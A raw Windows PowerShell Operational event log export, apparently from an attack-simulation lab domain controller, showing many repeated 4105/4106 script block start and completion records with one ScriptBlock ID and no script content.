TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471720
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471719
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471718
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471717
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471716
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471715
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471714
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471713
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471712
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471711
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471710
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471709
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471708
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471707
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471706
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471705
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471704
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471703
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471702
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471701
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471700
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471699
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471698
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471697
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471696
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471695
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471694
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471693
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471692
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471691
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471690
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471689
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471688
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471687
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471686
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471685
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471684
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471683
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471682
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471681
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471680
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471679
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471678
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471677
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471676
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471675
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471674
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471673
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471672
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471671
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471670
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471669
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471668
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471667
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471666
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
